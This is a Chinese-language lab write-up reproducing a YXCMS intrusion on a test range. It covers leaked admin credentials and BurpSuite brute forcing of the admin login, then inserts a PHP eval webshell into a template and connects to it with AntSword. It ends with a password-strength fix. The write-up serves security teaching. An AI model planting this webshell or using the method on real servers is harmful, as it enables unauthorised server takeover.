yxcms弱口令至getshell 漏洞复现
01 环境部署
(1)yxcms
yxcms 基于 PHP+MySQL 开发,这是一个采用轻量级 MVC 设计模式的网站管理系统。轻量级 MVC 设计模型使网站系统更加紧凑,且支持自定义表功能,使整个网站的数据结构设计更为灵活,也可以支持将图集、文章拓展成为其他实例,比如展品、分类等栏目。
本靶场中将使用 YXCMS 作为 Windows 7 边界服务器上开启的 Web 应用。
(2)phpStudy
phpStudy 是一款用于进行 PHP 环境调试的程序集成软件包。在软件安装后便
启动了 MySQL 服务、Apache 服务、PHP 设置等模块,是一款便捷的 PHP 环境调试工具。
phpStudy 在本靶场中用于在 Windows 7 上搭建 Web 服务。
02 漏洞配置
(1)消息泄漏
敏感数据主要包括:口令、证书、隐私数据、授权凭据、个人数据等,在网站
说明、程序文件、日志文件中都有可能包含敏感数据。
在攻击者进行测试的时候,通常有两种方法,一是利用工具检测,如用BurpSuite 的爬虫模块进行网站信息爬取,从获得敏感的数据信息。
二是通过手工挖掘,在浏览器中 F12 查看网页源代码,观察源代码中是否泄漏相关接口,从而发现敏感信息。该漏洞可能造成的风险是:攻击者利用上述方式对相关网站进行敏感情报收集,进而针对性地进行漏洞利用攻击。
本靶场配置了 yxcms 管理员后台地址、管理员默认账号密码消息泄漏,如下图
所示:
(2)管理员后台暴力爆破
暴力破解是专用于密码的破解方法,其破解方式为对密码进行逐个猜测,直至
推算到正确密码为止。它通常在网站登录系统上被使用,通过锁定已知的管理员的
账户名,对其可能的登录密码进行逐个尝试破解。
在攻击者进行测试的时候,通常的攻击方式是,首先寻找到网站后台登录页面。
再使用 BurpSuite 捕获登录行为数据包,将该数据包转发到 Intruder 利用模块,
并将其密码参数设置为变量,将有效载荷添加入攻击列表开始攻击,而后观察返回
包的字节长度,以此判断是否攻击成功。
该漏洞可能造成的风险是:攻击者利用弱口令登录网站管理员后台,以管理员权限进行恶意破坏。
本靶场配置了 yxcms 管理员账号 admin/admin123 弱口令,如下图所示。
03 利用方式
访问 yxcms页面,浏览网页相关消息。发现页面首页提示后台登录地址:http://192.168.40.133/yxcms/index.php?r=admin
尝试访问并用默认口令 admin/123456 登录,发现登录失败
利用 BurpSuite 代理工具对管理员账号密码进行暴力破解,加载弱口令字典,
发现弱密码 admin123 成功登录
使用 admin/admin123 成功登录 CMS管理员后台后,找到模板编辑处,往 index_index.php 中,插入一句话:
<?php eval($_POST["jkxy"]);?>
中国蚁剑连接 http://192.168.239.202/yxcms/index.php,使用 ipconfig 命
令进行虚拟终端功能测试,发现能成功返回 Windows 7 服务器 IP 地址
192.168.40.133
测试中国蚁剑文件管理功能,发现成功回显 webshell 所在目录C:/phpStudy/WWW/yxcms/public,说明中国蚁剑成功连接 webshell
至此攻击者通过yxcms弱口令至getshell,成功获取服务器权限。
04 修复方案
及时修改用户口令,确保密码强度符合要求,建议大小写字母+数字+特殊字符+8位以上。
- 点赞
- 收藏
- 关注作者
评论(0)